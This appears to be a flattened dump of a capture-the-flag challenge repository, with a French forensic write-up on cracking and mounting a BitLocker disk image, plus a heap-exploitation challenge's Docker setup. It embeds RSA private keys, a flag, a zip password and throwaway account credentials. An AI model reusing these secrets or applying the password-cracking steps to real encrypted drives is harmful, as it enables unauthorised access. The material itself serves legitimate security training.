├── CaptureTheFIC2020_Quals ├── forensic │ ├── doc.txt │ ├── extradisk.raw │ ├── short.txt │ └── wu_notfound.md └── pwn │ ├── Dockerfile │ ├── build.sh │ ├── certificates │ ├── clean.sh │ ├── client.crt │ ├── client.pem │ ├── generate_keys.sh │ ├── server.crt │ └── server.pem │ ├── chall │ ├── .gdb_history │ ├── doc.txt │ ├── heapme │ └── libc-2.23.so │ ├── create_zip_for_players.sh │ ├── flag.txt │ ├── run.sh │ ├── secret_ressources │ ├── .gdb_history │ ├── Makefile │ ├── exploit.py │ ├── exploit.py.sos │ ├── heapme │ ├── heapme.cpp │ └── requirements.txt │ ├── solutions │ ├── Shiro.md │ ├── geluchat.py │ ├── laxa.py │ └── uaf.py │ ├── test_player │ ├── 8e23eca76cbfdb90988a5b92577c147c.zip │ ├── client.pem │ ├── doc.txt │ ├── hash.txt │ ├── heapme │ ├── libc-2.23.so │ └── server.crt │ └── zip_hash.txt ├── CyberAfricaForum_2021 ├── binary │ ├── babi_reverse │ └── calc_reverse ├── forensic │ ├── Security.evtx │ ├── auth.log │ ├── crack_me_if_you_can.zip │ └── gocryptfs_bruteforce.zip └── network │ └── voip.pcap ├── README.md ├── breizh2k18_easy_mips ├── Dockerfile ├── README.md ├── README.txt ├── chall │ ├── Makefile │ ├── easy_mips.tar │ ├── exploit.py │ ├── flag │ ├── init.sh │ ├── inittab │ ├── install.sh │ ├── main.c │ ├── post_install_mips.sh │ ├── start_arm_now_mips.sh │ └── vuln ├── docker.sh └── regenerate_flag.sh └── breizh2k19 ├── go_reverse ├── .gdb_history ├── Makefile ├── flag.txt ├── gogo ├── main.go ├── peda-session-gogo.txt └── solution.txt └── reverse_ppc ├── generate_flag ├── generate_flag.c ├── main.c └── sh /CaptureTheFIC2020_Quals/forensic/doc.txt: -------------------------------------------------------------------------------- 1 | user: 2 | bosal43833 3 | bosal43833@mailt.top 4 | 5 | pass: 6 | bosal43833@mailt.top 7 | 8 | qemu-img create -f raw extradisk.raw 150M 9 | https://www.suares.com/index.php?page_id=25&news_id=209 10 | 11 | 12 | link to the flag => 13 | https://gist.github.com/bosal43833/3e815abc3f92e45963a8aafc8acfe411 14 | 15 | losetup /dev/loop0 extradisk.raw 16 | dislocker /dev/loop0 -upassword -- /media/bitlocker 17 | 18 | raw to vmdk 19 | qemu-img convert -f raw -O vmdk extradisk.raw image.vmdk 20 | 21 | losetup /dev/loop0 image.vmdk 22 | 23 | losetup -o 65536 /dev/loop1 /dev/loop0 24 | dislocker /dev/loop1 -upassword -- /media/bitlocker 25 | mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount 26 | 27 | # ou alors 28 | # dislocker extradisk.raw -O 65536 -upassword -- /media/bitlocker/ 29 | 30 | binwalk /media/bitlocker/dislocker-file 31 | 32 | 33 | 34 | github repo: 35 | https://github.com/bosal43833/264f074405496b5f1df00b45ef3897c3 36 | 37 | L'objectif est d'ouvrir le bitlocker en devinant que le mot de passe est "password", puis ensuite utiliser n'importe quel outil de récupération de fichier supprimé pour trouver un zip contenant l'url du challenge d'après. tout ceci se fait simplement avec sous linux avec dislocker et bulk_extractor. 38 | 39 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/forensic/extradisk.raw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/forensic/extradisk.raw -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/forensic/short.txt: -------------------------------------------------------------------------------- 1 | fdisk -l extradisk.raw 2 | # we see start => 128 and secort size is 512 3 | # so start is => 512 * 128 => 0x10000 => 65536 4 | 5 | losetup /dev/loop0 extradisk.raw 6 | losetup -o 65536 /dev/loop1 /dev/loop0 7 | dislocker /dev/loop1 -upassword -- /media/bitlocker 8 | mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount 9 | 10 | bulk_extractor /media/bitlocker/dislocker-file -o o/ 11 | 12 | 13 | # clean 14 | umount /media/bitlockermount 15 | umount /media/bitlocker 16 | losetup -d /dev/loop1 17 | losetup -d /dev/loop0 18 | 19 | https://hub.docker.com/r/hypnza/misc-binaries 20 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/forensic/wu_notfound.md: -------------------------------------------------------------------------------- 1 | Writeup forensic # by Notfound 2 | 3 | >>> mmls 76b0c868ab7397cc6a0c0a1e107e3079.raw 4 | DOS Partition Table 5 | Offset Sector: 0 6 | Units are in 512-byte sectors 7 | 8 | Slot Start End Length Description 9 | 000: Meta 0000000000 0000000000 0000000001 Primary Table (#0) 10 | 001: ------- 0000000000 0000000127 0000000128 Unallocated 11 | 002: 000:000 0000000128 0000198783 0000198656 NTFS / exFAT (0x07) 12 | 003: ------- 0000198784 0000204799 0000006016 Unallocated 13 | 14 | On voit une partition NTFS qui commence à l'offset 128 et termine à l'offset 198783. Du coup j'utilise dd (cc @saxx) 15 | 16 | >>> dd if=76b0c868ab7397cc6a0c0a1e107e3079.raw of=ntfs_part.raw bs=512 skip=128 count=198783 17 | 198783+0 enregistrements lus 18 | 198783+0 enregistrements écrits 19 | 101776896 octets (102 MB, 97 MiB) copiés, 1,89805 s, 53,6 MB/s 20 | 21 | >>> file ntfs_part.raw 22 | ntfs_part.raw: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "-FVE-FS-", sectors/cluster 8, reserved sectors 0, Media descriptor 0xf8, sectors/track 63, heads 16, hidden sectors 128, FAT (32 bit), sectors/FAT 8160, serial number 0x0, unlabeled; NTFS, sectors/track 63, physical drive 0x1fe0, $MFT start cluster 393217, serial number 02020454d414e204f, checksum 0x41462020 23 | 24 | Je remarque rapidement le flag -FVE-FS- qui me fait souvenir d'un bitlocker. Du coup, bah go bitlocker2john : 25 | 26 | >>> bitlocker2john -i ntfs_part.raw >> hash_bitlocker 27 | >>> cat hash_bitlocker 28 | ... 29 | User Password hash: 30 | $bitlocker$0$16$6946a04b89585fea10b4817c9a3917c9$1048576$12$c0297b4057a9d50103000000$60$724b0b483ed7b6c3cef283d34830adb006f1ae732a39b2eccf84959b53a1735fb9cb2f67e88282ccf5b1a04cc0a74d84778097b2db1cb689a70bfd79 31 | Hash type: User Password with MAC verification (slower solution, no false positives) 32 | $bitlocker$1$16$6946a04b89585fea10b4817c9a3917c9$1048576$12$c0297b4057a9d50103000000$60$724b0b483ed7b6c3cef283d34830adb006f1ae732a39b2eccf84959b53a1735fb9cb2f67e88282ccf5b1a04cc0a74d84778097b2db1cb689a70bfd79 33 | Hash type: Recovery Password fast attack 34 | $bitlocker$2$16$b95e642d93ec40c16a7a77b87bc3cadf$1048576$12$c0297b4057a9d50106000000$60$60f1218fafabac6be20ecf31565d4e15f3e0ef3b5650e6d30535f7bd08eed2c6dc0992252927140339b470b794a6f2338b07369d1ec9e969d677b262 35 | Hash type: Recovery Password with MAC verification (slower solution, no false positives) 36 | $bitlocker$3$16$b95e642d93ec40c16a7a77b87bc3cadf$1048576$12$c0297b4057a9d50106000000$60$60f1218fafabac6be20ecf31565d4e15f3e0ef3b5650e6d30535f7bd08eed2c6dc0992252927140339b470b794a6f2338b07369d1ec9e969d677b262 37 | 38 | J'ai laissé tourner à peine 1 minute, puis j'ai mount le volume avec dislocker : 39 | 40 | >>> john --show hash_bitlocker 41 | ?:password 42 | ?:password 43 | >>> mkdir mountpoint_bitlocker 44 | >>> dislocker -V ntfs_part.raw -v -u mountpoint_bitlocker/ 45 | Enter the user password: 46 | >>> mount |grep bitlock 47 | dislocker on /home/notfound/CHALLENGES/FIC2020/FIC/mountpoint_bitlocker type fuse.dislocker (rw,nosuid,nodev,relatime,user_id=1000,group_id=100) 48 | 49 | On a maintenant une image disk "non chiffrée". Donc forensic classique : 50 | 51 | >>> fls dislocker-file 52 | r/r 4-128-4: $AttrDef 53 | r/r 8-128-2: $BadClus 54 | r/r 8-128-1: $BadClus:$Bad 55 | r/r 6-128-4: $Bitmap 56 | r/r 7-128-1: $Boot 57 | d/d 11-144-4: $Extend 58 | r/r 2-128-1: $LogFile 59 | r/r 0-128-1: $MFT 60 | r/r 1-128-1: $MFTMirr 61 | r/r 9-128-8: $Secure:$SDS 62 | r/r 9-144-11: $Secure:$SDH 63 | r/r 9-144-5: $Secure:$SII 64 | r/r 10-128-1: $UpCase 65 | r/r 3-128-3: $Volume 66 | r/r 39-128-1: flag.txt 67 | d/d 35-144-6: System Volume Information 68 | -/r * 64-128-2: ls 69 | -/r * 65-128-2: fic.zip 70 | -/r * 66-128-2: f1.zip 71 | -/r * 67-128-2: f2.zip 72 | -/r * 68-128-2: f3.zip 73 | -/r * 69-128-2: f4.zip 74 | V/V 256: $OrphanFiles 75 | 76 | Le fichier fic.zip a l'air intéressant, affichons le : 77 | 78 | >>> icat dislocker-file 66-128-2 | icat dislocker-file 66-128-2 | gzip -dc 79 | https://gist.github.com/bosal43833/3e815abc3f92e45963a8aafc8acfe411 80 | 81 | Pwned. Merci au revoir. 82 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ctfchaignc/xenial_socat 2 | # FROM ubuntu:xenial 3 | 4 | RUN useradd -ms /bin/bash ctf 5 | # RUN apt update -y && apt install openssl 6 | 7 | COPY ./chall /chall 8 | COPY ./flag.txt / 9 | 10 | COPY ./certificates /certs 11 | RUN chown ctf -R /certs/ && chmod 600 /certs/*.* 12 | 13 | USER ctf 14 | 15 | EXPOSE 4242/tcp 16 | 17 | CMD socat -d openssl-listen:4242,reuseaddr,fork,cert=/certs/server.pem,cafile=/certs/client.crt EXEC:/chall/heapme 18 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t fic_pwn 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/clean.sh: -------------------------------------------------------------------------------- 1 | rm -rf *.crt *.pem *.key 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/client.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDazCCAlOgAwIBAgIUU+U67+J3MSRyPm3Xh77DwO5k8dEwDQYJKoZIhvcNAQEL 3 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 4 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 5 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 6 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 7 | AQUAA4IBDwAwggEKAoIBAQC4ffFutGs+jf5lS64+Wl1crRJciuL4Ws9pAmHF0WSD 8 | T33r7k8Afl60MLv/2TNgo+UXOaRqWMru3rlAJsS9mb2wdsDIiKOJU2Hivhe/KNBk 9 | hbRL4dIkWrkFdHKEboH+11S933su9goHQd+3SC5kC0kvcykT+/uE3yZnRLav0e6j 10 | PmAdEo5Ws/ub7syE73HQoDAJbJrKloI4Jg/ilybqujEbZ4PRUmKNukGbf8hYFzWB 11 | k+FdZdzibcQAK7WZ188IIkRzKyDaSktBRJMqe7mf7JDvTqDbmMFkRXiPPCSfb6rJ 12 | eFaKzdscDw9S5ceQW/urdVFFKI+7iFUNKgPmy/jFHWZdAgMBAAGjUzBRMB0GA1Ud 13 | DgQWBBTTmSmFlbFs0GvN8gil9YHm8ahaXDAfBgNVHSMEGDAWgBTTmSmFlbFs0GvN 14 | 8gil9YHm8ahaXDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQCO 15 | sDJ8sm1APzm4Ick3QuYJNDiTqJo3zCYTKLxr6sSgA+N9GC5knrtEnYQNbd1C8aTA 16 | XdyvPQRio6S6/Di5iFwWM58yMunW3iA5OtqPUu4A6YmG8Qpzx3CglbOw0EjTICwa 17 | h2WuAk43KlsmpAWPWqts3sfL/8rRp/3LvNx0hrroCouTiB4Bi+nDOjvitlJngfyo 18 | +bqNJsEtscvCDZPG2YL1qheiGHWHT4YkBAVv8HDyCzPduWOe+ajACybHEXPFr69v 19 | JIRI7YCzdJJuxqU9Q3a9ZgJ6x0zVUFOUBQcxcN923zo+80KY6B4ZlTQnXy9PD+aF 20 | wLPtqs6gc01QP/V/k4+e 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/client.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEpAIBAAKCAQEAuH3xbrRrPo3+ZUuuPlpdXK0SXIri+FrPaQJhxdFkg0996+5P 3 | AH5etDC7/9kzYKPlFzmkaljK7t65QCbEvZm9sHbAyIijiVNh4r4XvyjQZIW0S+HS 4 | JFq5BXRyhG6B/tdUvd97LvYKB0Hft0guZAtJL3MpE/v7hN8mZ0S2r9Huoz5gHRKO 5 | VrP7m+7MhO9x0KAwCWyaypaCOCYP4pcm6roxG2eD0VJijbpBm3/IWBc1gZPhXWXc 6 | 4m3EACu1mdfPCCJEcysg2kpLQUSTKnu5n+yQ706g25jBZEV4jzwkn2+qyXhWis3b 7 | HA8PUuXHkFv7q3VRRSiPu4hVDSoD5sv4xR1mXQIDAQABAoIBAA0KGb5RUiMhthFC 8 | wBX4HREnylxwFIqpIG+zk2V/3zLIs4WxWjQWumrR5ve2SkNSUibKFCzQCcfIRh+a 9 | nd0ouJd4TTffMG/MTObRuKvyHoh8SrnyQ//9yYXxLQbfKKDyZzLkULiI+zx4E2/I 10 | 0j6P7aRE52paLPS/MN+ro53ZoJw49YDj9JPLlTbwiDdQjJc1iTszzuz0kJpIKdVF 11 | mIw80AtW6cOG6ZwbRhL+JB6obGB20R9v6A3up1/x9L15Ocp3CROVjUdV1vpwcUny 12 | rMnSYFlA2Z34stkVxpzvEFE9Jz3YxMJk9ThAMCXrMiAAFzMkLsRtAuJ4bn592nU6 13 | t5aE/wECgYEA8JwwwaIlA0X8dRM4q96T5Ojigl6bj9YrnxHrTgTYj4C6MxkZgR9f 14 | LJjwHiJwilAMfOAknImUt575Qo0gtnJUttFiSR/lqOdNl7rN3aYn3zSKGIE84R2z 15 | DT7FNEuAkerU4QyKqKvzjCIeTO3Ku3rwET+pKIF9mb/6531DVvUnO8kCgYEAxErc 16 | MRXSHqmizYEliPF9A+bIUdumMMnW14iiPZrc+SPMbOG/AfuSOrAXAl9nRlYM1OPG 17 | XTSp41aDGjXyYjgF8581HqSOSehdy42GlBmmEQgThHBWhmwemENUKVjv9HLBYWwK 18 | LpzoM7Wt1RjwWvtGzXkhQ+JQiWYlVNYDuS1xN/UCgYEA1dPYuJxijFAsFddpK8R4 19 | ZpxYgEeXs/I/ffQsy38e/hkGYNbThZ7dtAKOkhlFLoYJMwj3QG48Thrnpa9J/RoK 20 | ExZtZFMGhF5a5JbM0UgScxh8CV8BPYZpU0IPe3QF5KdvXDkLGO8HV+gSSYeh/Y85 21 | vfp3WFoLxxGH5yW5LJRds5ECgYBXj1UdiDBMgTsgFIXbym0LunyNFz/Q75goWMiW 22 | VmhPskpUH3cGuWOHTllVM51r4KKkrF4l4YIO6N5eaMYQThFJlTEq1BismzyLujvY 23 | AID1g/bA0yOlnsEfBpmaQBP5pN7iSEFafZ+OwXIjZpaA3ym8KlZOY7utLqVkbHsI 24 | tV6VqQKBgQCp9KtVPG8MMNBfTeXqEiKUpNaxgyWjC32SCXYfMwPmEdN1Ndlrt0ts 25 | oUAeYP6AFYBfVR+fFreVXvdaOrBQuF1nf1dBd2E085v/BXhV/rY2W9EKL3F7Ju7d 26 | l6BTOSbxHD1Ctn3D7NwWCpVSqqxlIf+1NiBSwC4iuLeBDfkglteZPA== 27 | -----END RSA PRIVATE KEY----- 28 | -----BEGIN CERTIFICATE----- 29 | MIIDazCCAlOgAwIBAgIUU+U67+J3MSRyPm3Xh77DwO5k8dEwDQYJKoZIhvcNAQEL 30 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 31 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 32 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 33 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 34 | AQUAA4IBDwAwggEKAoIBAQC4ffFutGs+jf5lS64+Wl1crRJciuL4Ws9pAmHF0WSD 35 | T33r7k8Afl60MLv/2TNgo+UXOaRqWMru3rlAJsS9mb2wdsDIiKOJU2Hivhe/KNBk 36 | hbRL4dIkWrkFdHKEboH+11S933su9goHQd+3SC5kC0kvcykT+/uE3yZnRLav0e6j 37 | PmAdEo5Ws/ub7syE73HQoDAJbJrKloI4Jg/ilybqujEbZ4PRUmKNukGbf8hYFzWB 38 | k+FdZdzibcQAK7WZ188IIkRzKyDaSktBRJMqe7mf7JDvTqDbmMFkRXiPPCSfb6rJ 39 | eFaKzdscDw9S5ceQW/urdVFFKI+7iFUNKgPmy/jFHWZdAgMBAAGjUzBRMB0GA1Ud 40 | DgQWBBTTmSmFlbFs0GvN8gil9YHm8ahaXDAfBgNVHSMEGDAWgBTTmSmFlbFs0GvN 41 | 8gil9YHm8ahaXDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQCO 42 | sDJ8sm1APzm4Ick3QuYJNDiTqJo3zCYTKLxr6sSgA+N9GC5knrtEnYQNbd1C8aTA 43 | XdyvPQRio6S6/Di5iFwWM58yMunW3iA5OtqPUu4A6YmG8Qpzx3CglbOw0EjTICwa 44 | h2WuAk43KlsmpAWPWqts3sfL/8rRp/3LvNx0hrroCouTiB4Bi+nDOjvitlJngfyo 45 | +bqNJsEtscvCDZPG2YL1qheiGHWHT4YkBAVv8HDyCzPduWOe+ajACybHEXPFr69v 46 | JIRI7YCzdJJuxqU9Q3a9ZgJ6x0zVUFOUBQcxcN923zo+80KY6B4ZlTQnXy9PD+aF 47 | wLPtqs6gc01QP/V/k4+e 48 | -----END CERTIFICATE----- 49 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/generate_keys.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | sh clean.sh 3 | generate_keys() { 4 | if [ ! "$#" -gt 0 ]; then echo "ERROR Usage: server or client"; exit ; fi 5 | FILENAME=$1 6 | # openssl genrsa -out $FILENAME.key 1024 7 | openssl genrsa -out $FILENAME.key 2048 8 | openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt -batch 9 | cat $FILENAME.key $FILENAME.crt >$FILENAME.pem 10 | chmod 600 $FILENAME.key $FILENAME.pem 11 | rm $FILENAME.key 12 | } 13 | 14 | generate_keys server 15 | generate_keys client 16 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/server.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDazCCAlOgAwIBAgIUDMCIiz4Z5cL8z9a/F09/Zc7O7zMwDQYJKoZIhvcNAQEL 3 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 4 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 5 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 6 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 7 | AQUAA4IBDwAwggEKAoIBAQDHmd6vjAO9qBaEtJB+hSQetQn0EFCJ0fpVpENubjFK 8 | 3Es6UBaERtmKAvzNsfThQf1CZAL3jD237mqHTpbqg2v+WLL8c9qPcWmNDzg1Ix62 9 | sEfvwaN4oYCYe/q1VcthCUawSMjxV9EhJsbjJC4BBZCxDuleuNXTzjD/Bl7zIqJO 10 | 8Kxkc/gMeE5b6sQPOx6zla4fRxa9wNAqjdasXBotyzsyHkFOzQpHOpjMExHenIfu 11 | Rs3A9pkgubi6kfMdvphZxbbVnAkb1n19YalhYd7dQKBtMakOezuVrG024p2XQVpJ 12 | ZH+qrhjNz0V2wwazSZzsEkS7kYBV0wtT90eLYZVKzP2bAgMBAAGjUzBRMB0GA1Ud 13 | DgQWBBQ5QMn7/13sP90X/0ovikRqvvuyaTAfBgNVHSMEGDAWgBQ5QMn7/13sP90X 14 | /0ovikRqvvuyaTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAm 15 | MeTnFLNNRIzqciK8CXyi07ZifPiyXxouR5rw3368KU6DSrX8Ehkn/a+Ldx783+93 16 | +alXeRkEk1NiSNKuGkpBIF/6FKhh+3y7TUikyNW7urQIfTsw2ZQk/BKM3qQwRauH 17 | RczDKmM9ClHQbFu+1nbddiR7l8P4SDGwsSOXhtlItIJ4Y7MixJsPJT5eUq4kSGfZ 18 | 5+rgIniz4V00Iz47Uxn88FBzTxQaejUEXVbrtTbijmNddByMjbZ/TNz+J1SwjckN 19 | rSjpClOkCeW1U4LrrezgOZ15FzQgE7LT7BghqQtjWDZvnMjjUgmYGOt8MS9JtLY/ 20 | SeSwLTw6i2lmaMDWJyxt 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/certificates/server.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEogIBAAKCAQEAx5ner4wDvagWhLSQfoUkHrUJ9BBQidH6VaRDbm4xStxLOlAW 3 | hEbZigL8zbH04UH9QmQC94w9t+5qh06W6oNr/liy/HPaj3FpjQ84NSMetrBH78Gj 4 | eKGAmHv6tVXLYQlGsEjI8VfRISbG4yQuAQWQsQ7pXrjV084w/wZe8yKiTvCsZHP4 5 | DHhOW+rEDzses5WuH0cWvcDQKo3WrFwaLcs7Mh5BTs0KRzqYzBMR3pyH7kbNwPaZ 6 | ILm4upHzHb6YWcW21ZwJG9Z9fWGpYWHe3UCgbTGpDns7laxtNuKdl0FaSWR/qq4Y 7 | zc9FdsMGs0mc7BJEu5GAVdMLU/dHi2GVSsz9mwIDAQABAoIBAELrH3GTa52mQQZ0 8 | 0wzX7mgtIg0lexr5vwf/bmwTnYsPmFkQiLwIVN6kacU8qHDtAs/DYAtGhVqpICYE 9 | /yvYq9g2PKvO27PDvjOAqsOF5sIxD60eKoRDAS4eQsuQ3ALIbV6kyFnBq2eF7KAy 10 | fQnyp7P03+DV7zp3oo2dwS+aqPf1uAaF1Hf67QcOttJSxFgD6jYKTunD9IrIRUn+ 11 | gcsLJQnUVXAWB4XLydL5rmTa3SsLb1xF2cExLYnEreNDc6Wn7YGlwJ/imr16SAuh 12 | pD073V1ADW6ECHeX2UteGCZzMx7cNGij2lQVsG9d2fRS3BFOl2fYb9l2cW4d2cRm 13 | RlrZQOECgYEA/WR2pAZfLJQUAVEOYfRvKEY5KibRNIuXSw8ypC7jKws5QdrsbFAu 14 | aYdOLzStGFIJNfYSqP1phwopQL4M+8Wzad/SeKSIxL08u+qRZwkMLLmLtys0AtJh 15 | eiNM2dyJxlEnO2fIjctNX5+omc1i2GrOik8woDQzMVq0NXKAfGP8p/UCgYEAyaey 16 | 0aYxTt71N+UqGKpcmuP0L+7Apma/jQhDGJTqlCwBS6WEh9Rto7+UEwKQGwwJ1WhO 17 | o6uw9dxgxykCw2MkNOTJBnNCCjb5eWVdTyfz09WbSalI6U5bk7t2Z7mnG7STuh1s 18 | YfOj6coS6BiBNhQtrQT22mxl+zJEnCkwwmPb5U8CgYAmrPXa1UojkLp49PlABEIP 19 | IKDLCT+3SHMgNsKhArMTt9PWdGbPpXFgFBHf7Kda5fKX9OYmOv+nZ+qiAiATMbrP 20 | tyT12w8xED075XKqClx8WxmzLHn00E2micrKGfpBddOKIq4ezmAR71mZmBq1M6Aw 21 | xiOC4FTL/K8y1TY9RjmjHQKBgC8Gd3Hicq802TR+sXFtEQlhzUj8QVrMrTDDU3pB 22 | B+8jz+2HHL/cLvE3tN02BMr55LUqjOQoHq1HBh6LlsRfs0rOa36glC7zoPvJQpg5 23 | 9edZccwcuQ8HId3yomsP5UNVufl18RdqjLfxUrVjOYaV8AzgEnzfOGz6zPsps+Ax 24 | D0+LAoGAZO3++Y4tJOoCHVRE5y8oE604/8J/kFKIpJ8dcHpgET4lA7aKsP0+j8UE 25 | EggZNaLjSk/naB9AFFHNscpY8v9wrnshQJxaA9WiA9utb4RciqcshZW465Xy2DGZ 26 | LrdgLiGOOZ32MC0g7T6TfMk2A1/zKFcg/DOEeik5rpw0SwoR5Kw= 27 | -----END RSA PRIVATE KEY----- 28 | -----BEGIN CERTIFICATE----- 29 | MIIDazCCAlOgAwIBAgIUDMCIiz4Z5cL8z9a/F09/Zc7O7zMwDQYJKoZIhvcNAQEL 30 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 31 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xOTEyMTExNzIwMjFaFw0yOTEy 32 | MTExNzIwMjFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 33 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB 34 | AQUAA4IBDwAwggEKAoIBAQDHmd6vjAO9qBaEtJB+hSQetQn0EFCJ0fpVpENubjFK 35 | 3Es6UBaERtmKAvzNsfThQf1CZAL3jD237mqHTpbqg2v+WLL8c9qPcWmNDzg1Ix62 36 | sEfvwaN4oYCYe/q1VcthCUawSMjxV9EhJsbjJC4BBZCxDuleuNXTzjD/Bl7zIqJO 37 | 8Kxkc/gMeE5b6sQPOx6zla4fRxa9wNAqjdasXBotyzsyHkFOzQpHOpjMExHenIfu 38 | Rs3A9pkgubi6kfMdvphZxbbVnAkb1n19YalhYd7dQKBtMakOezuVrG024p2XQVpJ 39 | ZH+qrhjNz0V2wwazSZzsEkS7kYBV0wtT90eLYZVKzP2bAgMBAAGjUzBRMB0GA1Ud 40 | DgQWBBQ5QMn7/13sP90X/0ovikRqvvuyaTAfBgNVHSMEGDAWgBQ5QMn7/13sP90X 41 | /0ovikRqvvuyaTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAm 42 | MeTnFLNNRIzqciK8CXyi07ZifPiyXxouR5rw3368KU6DSrX8Ehkn/a+Ldx783+93 43 | +alXeRkEk1NiSNKuGkpBIF/6FKhh+3y7TUikyNW7urQIfTsw2ZQk/BKM3qQwRauH 44 | RczDKmM9ClHQbFu+1nbddiR7l8P4SDGwsSOXhtlItIJ4Y7MixJsPJT5eUq4kSGfZ 45 | 5+rgIniz4V00Iz47Uxn88FBzTxQaejUEXVbrtTbijmNddByMjbZ/TNz+J1SwjckN 46 | rSjpClOkCeW1U4LrrezgOZ15FzQgE7LT7BghqQtjWDZvnMjjUgmYGOt8MS9JtLY/ 47 | SeSwLTw6i2lmaMDWJyxt 48 | -----END CERTIFICATE----- 49 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/.gdb_history: -------------------------------------------------------------------------------- 1 | "rofi -show drun -font \\"DejaVu 9\\" -run-shell-command '{terminal} -e \\" {cmd}; read -n 1 -s\\"'" 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/doc.txt: -------------------------------------------------------------------------------- 1 | socat stdio openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0 2 | 3 | You know the drill, let's pwn the planet. 4 | 5 | # Hexpresso / @chaignc 6 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/heapme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/chall/heapme -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/chall/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/chall/libc-2.23.so -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/create_zip_for_players.sh: -------------------------------------------------------------------------------- 1 | zip -e --password powell82435 -j for_the_players.zip \ 2 | ./chall/* \ 3 | ./certificates/client.pem \ 4 | ./certificates/server.crt 5 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/flag.txt: -------------------------------------------------------------------------------- 1 | 5c141765db003a82e9a9978566b6d78f@hexpresso.fr 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/run.sh: -------------------------------------------------------------------------------- 1 | docker run -p 4242:4242 -it fic_pwn 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/.gdb_history: -------------------------------------------------------------------------------- 1 | attach 30398 2 | telescope 0x55b024d262b0 3 | telescope 0x55b024d262d0 4 | telescope 0x55b024d26310 5 | telescope 0x55b024d262f0 6 | c 7 | x/a 0x55b024d262d0 8 | disassemble main 9 | disassemble main 10 | disassemble 0x55b02440c824 11 | 